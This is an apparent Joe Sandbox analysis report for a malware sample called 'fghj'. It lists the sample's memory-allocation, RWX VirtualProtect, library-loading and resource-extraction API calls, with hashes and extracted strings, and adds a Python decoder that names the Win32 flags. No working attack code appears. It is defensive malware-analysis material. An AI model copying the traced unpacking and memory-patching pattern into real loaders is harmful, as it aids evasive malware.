• VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: fa0249d43e39e9eecaf803a95b26af32fb05557c852f509792b866c59a570a09
• Instruction ID: 0ac98cb4488dedb0cf55f60dbc6393af8dc13710230795716c2c4f9349504d7e
• Opcode Fuzzy Hash: fa0249d43e39e9eecaf803a95b26af32fb05557c852f509792b866c59a570a09
• Instruction Fuzzy Hash: 3CC117779003258FCB0BEF76EC9756A376AFB93314F45862EE802DB165DF3855028A81
APIs
• VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 8bd12c5a242c404fce5654d0bbcc612aa96b36376ccb807f711b0f7ebeef69e3
• Instruction ID: 96276a4e44a7194e4fa0107266bc8bfc7c4e0cf624c20dafd4b5412db7bff6bb
• Opcode Fuzzy Hash: 8bd12c5a242c404fce5654d0bbcc612aa96b36376ccb807f711b0f7ebeef69e3
• Instruction Fuzzy Hash: FCB116779003218FDB1BEF7AEC9756A376AFB93304F45862EE802DB065DF3855028681
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 288383ffe8c6eae3dfdf95e47de925f2707f3fc648658c9d0f0fcb81971d35e9
• Instruction ID: fe10e44670d488e84639883cbe1ef6a9eb207072f02118bf198923be5e423395
• Opcode Fuzzy Hash: 288383ffe8c6eae3dfdf95e47de925f2707f3fc648658c9d0f0fcb81971d35e9
• Instruction Fuzzy Hash: CF7118779103108FCB0BEF79EC9759D376AEB93304F41862AE902DB065DF389502C681

Control-flow Graph (rendered as an image in the report; legend: Executed / Not Executed; edge list not reproduced)
• Function 00B4E8ED: entry calls subcall 00B50B0B and subcall 00B50BA9, then two pairs of VirtualProtect calls, each wrapped around calls to subcall 00B50B01 and subcall 00B51179, before exiting through 00B4E9E4
APIs
• Part of subcall function 00B50B0B: LoadLibraryA.KERNEL32(00000000,?,?), ref: 00B50B9D
• VirtualProtect.KERNEL32(00000000,0000000C,00000040,?), ref: 00B4E948
• VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 00B4E97B
• VirtualProtect.KERNEL32(00000000,0040145E,00000040,?), ref: 00B4E9AE
• VirtualProtect.KERNEL32(00000000,0040145E,?,?), ref: 00B4E9D8
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
Yara matches
Similarity
• API ID: ProtectVirtual$LibraryLoad
• String ID:
• API String ID: 895956442-0
• Opcode ID: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
• Instruction ID: 71b953ea1ca6de3d8a45256ff0091f53da736674168cdbf8cfbba260cd5070d4
• Opcode Fuzzy Hash: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
• Instruction Fuzzy Hash: 0421E5722042097FE310AA658C86F7B76DCEB85305F0408BAFF56D10D1EB75EA089271
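
The API bullets above, and the VirtualAlloc / VirtualFree / RtlExitUserProcess bullets of the function that follows, show raw hex arguments that only become meaningful once mapped to their Win32 constant names (0x40 is PAGE_EXECUTE_READWRITE, 0x3000 is MEM_COMMIT|MEM_RESERVE, 0xC000 is MEM_DECOMMIT|MEM_RELEASE). The decoder below is an added example and is not part of the Joe Sandbox report or of the sample: it parses the report's `Api.MODULE(args), ref: addr` bullet format (including the `Part of subcall function` prefix), treats `?` as an unresolved argument, names the flags, and attaches reviewer heuristics. The sample lines are copied from this page; the heuristics, their wording and the function names are this example's own.

```python
import re

# Constructed sample: API bullets copied from this report's function listings
# (the "•" bullets and the "Part of subcall function" prefix are kept on purpose).
SAMPLE_LINES = [
    "• Part of subcall function 00B50B0B: LoadLibraryA.KERNEL32(00000000,?,?), ref: 00B50B9D",
    "• VirtualProtect.KERNEL32(00000000,0000000C,00000040,?), ref: 00B4E948",
    "• VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 00B4E97B",
    "• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B4F7D7",
    "• VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 00B4FB1B",
    "• RtlExitUserProcess.NTDLL(00000000), ref: 00B4FB24",
]

# Win32 constants from winnt.h / memoryapi.h.
PAGE_BASE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_ALLOC = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x20000000: "MEM_LARGE_PAGES"}
MEM_FREE = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}

# Joe Sandbox bullet format: [Part of subcall function ADDR: ]Api.MODULE(a,b,...), ref: ADDR
LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")


def parse_arg(tok):
    """'?' means the plugin could not resolve the value; otherwise hex, '-' prefixed if negative."""
    tok = tok.strip()
    if tok == "?":
        return None
    return -int(tok[1:], 16) if tok.startswith("-") else int(tok, 16)


def page_protect(value):
    """Low byte is one protection constant, the upper bits are combinable modifiers."""
    base = PAGE_BASE.get(value & 0xFF, f"0x{value & 0xFF:X}")
    mods = [name for bit, name in PAGE_MODS.items() if value & bit]
    return "|".join([base, *mods])


def flag_names(value, table):
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)          # bits the table does not know
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def decode(line):
    text = re.sub(r"^[\s•]+", "", line).strip()
    m = LINE_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised API line: {line!r}")
    args = [parse_arg(a) for a in m["args"].split(",")]
    rec = {"api": m["api"], "module": m["module"], "ref": int(m["ref"], 16),
           "subcall": int(m["sub"], 16) if m["sub"] else None, "args": args, "notes": []}
    if rec["api"] == "VirtualProtect":            # (lpAddress, dwSize, flNewProtect, lpflOldProtect)
        size, prot = args[1], args[2]
        rec["size"] = size
        rec["protect"] = None if prot is None else page_protect(prot)
        if prot == 0x40:
            rec["notes"].append("existing pages set to PAGE_EXECUTE_READWRITE")
            if size is not None and size <= 0x10:
                rec["notes"].append("tiny RWX window: the shape of an inline patch or hook write")
    elif rec["api"] == "VirtualAlloc":            # (lpAddress, dwSize, flAllocationType, flProtect)
        rec["alloc_type"] = None if args[2] is None else flag_names(args[2], MEM_ALLOC)
        rec["protect"] = None if args[3] is None else page_protect(args[3])
    elif rec["api"] == "VirtualFree":             # (lpAddress, dwSize, dwFreeType)
        ft = args[2]
        rec["free_type"] = None if ft is None else flag_names(ft, MEM_FREE)
        if ft is not None and (ft & 0xC000) == 0xC000:
            rec["notes"].append("MEM_DECOMMIT and MEM_RELEASE combined; the API documents them as mutually exclusive")
    return rec


def decode_all(lines):
    return [decode(line) for line in lines]


def flagged(lines):
    """(api, ref) pairs that carry at least one reviewer note."""
    return [(r["api"], r["ref"]) for r in decode_all(lines) if r["notes"]]


if __name__ == "__main__":
    for r in decode_all(SAMPLE_LINES):
        print(f"{r['ref']:08X} {r['api']:<20}", r.get("protect"), r.get("alloc_type"),
              r.get("free_type"), r["notes"])
```

Run against the six lines, the decoder names the 0x40 protection and the 12-byte size on the first VirtualProtect, leaves the second VirtualProtect's `?` protection as unresolved (in the report it is the restore of the old protection), expands the VirtualAlloc flags to MEM_COMMIT|MEM_RESERVE with PAGE_READWRITE, and flags the VirtualFree call whose free type carries both MEM_DECOMMIT and MEM_RELEASE.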

Control-flow Graph (rendered as an image in the report; legend: Executed / Not Executed; edge list not reproduced)
• Function 00B4F75D: entry calls subcall 00B50D04 three times, VirtualAlloc at 00B4F7CB, then a long chain of internal subcalls (00B51179, 00B5119D, 00B50E71, 00B50D47, 00B50B0B, 00B4E8ED, the VirtualProtect routine above, 00B4E9E8, 00B4EA51, 00B4F54E, 00B4FB2D, 00B4F01A, 00B506FB, 00B4FE8D, 00B50F7C); ends with VirtualFree followed by RtlExitUserProcess at 00B4FB00-00B4FB24
APIs
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B4F7D7
• VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 00B4FB1B
• RtlExitUserProcess.NTDLL(00000000), ref: 00B4FB24
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
Yara matches
Similarity
• API ID: Virtual$AllocExitFreeProcessUser
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1828502597-0
                                                                                                                                                                                                                    • Opcode ID: 3017fd99d0584aa20b0153e116f0a50b272e6a421316d4372083565c5f77b8b3
                                                                                                                                                                                                                    • Instruction ID: 82ee01c5e8c515aacdbebbb7d70a06f0e087df7b39c266e0971f48ab85e96472
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3017fd99d0584aa20b0153e116f0a50b272e6a421316d4372083565c5f77b8b3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CB1D132500A07ABDB21AE64CC84BBBB7F8FF05300F1405B9FA5997151E731EA54EBA1

Control-flow Graph (legend: Executed / Not Executed)
Control-flow graph for the function at b50b0b (IDA plugin basic-block edge list, rendered as a graph in the original report; the blocks reach LoadLibraryA, with a call into b511d9)
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(00000000,?,?), ref: 00B50B9D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                    • String ID: .dll
                                                                                                                                                                                                                    • API String ID: 1029625771-2738580789
                                                                                                                                                                                                                    • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                    • Instruction ID: 3085919bb03e531d68a231a06a5b5cf9a31b7596f2839c23416168a387c6c8c2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9521E4716102858FE721EFA8C8C4B6A7BE4EF05329F1841EDDC428BA41D730EC498740

Control-flow Graph (legend: Executed / Not Executed)
Control-flow graph for the function at b4e9e8 (IDA plugin basic-block edge list, rendered as a graph in the original report; the blocks reach VirtualProtect twice, with calls into b50b0b, b50ba9 and b51179)
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00B50B0B: LoadLibraryA.KERNEL32(00000000,?,?), ref: 00B50B9D
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,00000004,00000040,?), ref: 00B4EA20
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,00000004,?,?), ref: 00B4EA43
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 895956442-0
                                                                                                                                                                                                                    • Opcode ID: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
                                                                                                                                                                                                                    • Instruction ID: 996b3d48b47379395a4cea9cb96869c23e2dd10962b795d8d8a998652460f9a7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6F081B2110614BEE611A664CC82FFB37ECEB49711F440498FF16D6080E6B1EA0996B1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: !$!$"$#$%$%$&$&$'$'$($($)$)$)$*$+$,$-$/$0$1$1$2$5$8$8$>$?$@$@$B$D$D$D$D$E$I$O$O$O$Q$Q$X$]$_$_$_$`$`$`$`$i$l$o$p$q$u$w$z$z
                                                                                                                                                                                                                    • API String ID: 0-4223306389
                                                                                                                                                                                                                    • Opcode ID: 3890bb4db51ad410a72e924302e9b5ec5b34e3da985793a2f72d822e123a2a89
                                                                                                                                                                                                                    • Instruction ID: 592f4c3149b94e2b663d839ffbb14671eefcb1e28b5c5ce2c4dc3a4cb3dadc67
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3890bb4db51ad410a72e924302e9b5ec5b34e3da985793a2f72d822e123a2a89
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9213AD7150C7C18AC3358B3888953DFBBE1ABD6324F598AADE4E9873D2D77488418B53
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: $"$"$#$#$$$'$($*$*$*$,$.$1$4$6$8$8$9$:$>$A$B$E$G$J$L$Q$W$X$Z$[$[$_$`$c$c$d$d$f$l$m$m$n$n$p$q$r$v$~
                                                                                                                                                                                                                    • API String ID: 0-3593980817
                                                                                                                                                                                                                    • Opcode ID: 336ad24c0fead976a234a7cc69689f16e2cd558e21ff6dfd065e4a08ac84cfd9
                                                                                                                                                                                                                    • Instruction ID: afcba2eccc10ad300cfe9c14ffc3228f483916730b9f367eb59bfcc3473ca217
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 336ad24c0fead976a234a7cc69689f16e2cd558e21ff6dfd065e4a08ac84cfd9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 942211209087EA89DB32C73C8C587DDBFA15B27324F0843D9D4E96B2D2D7750A85CB66
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: "04$!j#l$,n_`$;zI|$<~Ip$D>C0$F:]<$GrDt$PfYx$QbRd$T2@4$UfSx$Y.J $Y6~H$\"O$$`R7T$hZh\$jk$l^nP$u&U8$uFsX$zJ|L$<>$|~
                                                                                                                                                                                                                    • API String ID: 0-1227251085
                                                                                                                                                                                                                    • Opcode ID: 89e3a4c6c8e580158efb4c17197ecf1b83ed33bd00be6b9e94d98b0a36575ae8
                                                                                                                                                                                                                    • Instruction ID: d3fe1e7d50e0150f9b62ef6472013b1b6e56899eb682ea1d6eacf0cdb53e8cfc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89e3a4c6c8e580158efb4c17197ecf1b83ed33bd00be6b9e94d98b0a36575ae8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0132FBB060C3D48AD334CF59D042B8FBAF2FB92300F40891DC5E96B656D7B1864A9B97
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(00000000,0000018C,?,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00000000,000001D0,000001D0), ref: 003A5B99
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?), ref: 003A5BA6
                                                                                                                                                                                                                    • FindResourceW.KERNEL32(00000000,?,?,0000000A,0000018C,?,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 003A5C36
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?), ref: 003A5C42
                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed), ref: 003A5C95
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?), ref: 003A5CA2
                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed), ref: 003A5D19
                                                                                                                                                                                                                    • LockResource.KERNEL32(?,?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed), ref: 003A5D24
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,000001D0,000001D0,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?), ref: 003A5D2E
                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,?,?,?,?,00000000,00000000,000001D0,000001D0), ref: 003A5DB4
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000000,00000000,000001D0,000001D0,?,0000005C), ref: 003A5DC9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Resource$ErrorLast$FreeLibraryLoad$FindLockSizeof
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3462591719-0
                                                                                                                                                                                                                    • Opcode ID: 6cf6fd0791ec1306ffbc6ce5f2605202d11c2f0e9f84f15c5863f40c75164cca
                                                                                                                                                                                                                    • Instruction ID: 1a93b1474b3ea258502a6601af2158892d0b2449755efd833c7832079793335d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cf6fd0791ec1306ffbc6ce5f2605202d11c2f0e9f84f15c5863f40c75164cca
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F61ACB5620204BBDF0AFBB6DC5BDAE3A7DEF5B340F004129F502DA192EE7599448660
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: &0" $2)6 $=342$=Q^^$I2?8$Yz$aD4N$e$rmte$sD4N$wu~g
                                                                                                                                                                                                                    • API String ID: 0-1157038571
                                                                                                                                                                                                                    • Opcode ID: d9fd46ed380715bf220d02342fb719428f4c7fb6f61d62cf527223ce85d7dfa6
                                                                                                                                                                                                                    • Instruction ID: e5e359819ceef1da69ef5867643ba340f5fff9d3c1162ddc4f08d708d4cff9c0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9fd46ed380715bf220d02342fb719428f4c7fb6f61d62cf527223ce85d7dfa6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D35225715083958FC721DF24D84076EBBE2EFD6310F0886ACE8E95B392DB359906C792
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: !@$,$-$.$/$>
                                                                                                                                                                                                                    • API String ID: 0-287882502
                                                                                                                                                                                                                    • Opcode ID: cf19f83d45970e8620fc48b7023a2a9d2bf520ca8dc12e1cf1ca8289be2d71dc
                                                                                                                                                                                                                    • Instruction ID: e6f663546ed1a82108edef2ce06d3160bcf7086690221ac931ddace79a7b5900
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf19f83d45970e8620fc48b7023a2a9d2bf520ca8dc12e1cf1ca8289be2d71dc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E722D03150C7A08FD3248F2894953AFBBE1AB86324F194AADE5D9C73D2D6798845CB43
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .S0U$3W>Y$>C)E$I/5Q$Icde$gK)M
                                                                                                                                                                                                                    • API String ID: 0-3316345126
                                                                                                                                                                                                                    • Opcode ID: 4af5d83895553d45601979b4567cc6a62415f89b2a79592c0e01c78599941761
                                                                                                                                                                                                                    • Instruction ID: ffd754986959df94d714361c65c4e7b87bfd2d03ebdaeaf2b327e9ff712f813a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4af5d83895553d45601979b4567cc6a62415f89b2a79592c0e01c78599941761
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98B102B15083209BD724DF24D86266BB7F1FFD6350F198A5CE9DA8B390E7399900CB46
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: BC$P$wh$pr$t*v$|~
                                                                                                                                                                                                                    • API String ID: 0-2068921225
                                                                                                                                                                                                                    • Opcode ID: d7ce41c6af378870f071cefbe2497e7834784d7017225703bd9058ba8bbb2727
                                                                                                                                                                                                                    • Instruction ID: cc537e0f2579ef043cc9d1d82436630a175803282dc7233cb02a9832891cf6f3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7ce41c6af378870f071cefbe2497e7834784d7017225703bd9058ba8bbb2727
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32B100B15083018BD720DF28C892AABB7F1EF92314F5889ACE8E59B390F735D945C756
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: *$*$+$+$,$,
                                                                                                                                                                                                                    • API String ID: 0-423665535
                                                                                                                                                                                                                    • Opcode ID: 08fd3baebd715386d14a4854788fababafee1648addd8b934745a11d46aaee68
                                                                                                                                                                                                                    • Instruction ID: 1280261dd3f26a89dd54cc5a9ab3097cd7613638190859d4a3fb6fe11d73f3bd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08fd3baebd715386d14a4854788fababafee1648addd8b934745a11d46aaee68
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6991F66364C7D18AC325853C485565BEED24BE3134F2DCBADD8F69B3D2D525C80683A3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: I,~M$L !$o`$pr$tv
                                                                                                                                                                                                                    • API String ID: 0-893526404
                                                                                                                                                                                                                    • Opcode ID: 4ce505b89c1af04ac6ad5407cb6a86e854819c669a549d688737e1f1a330426d
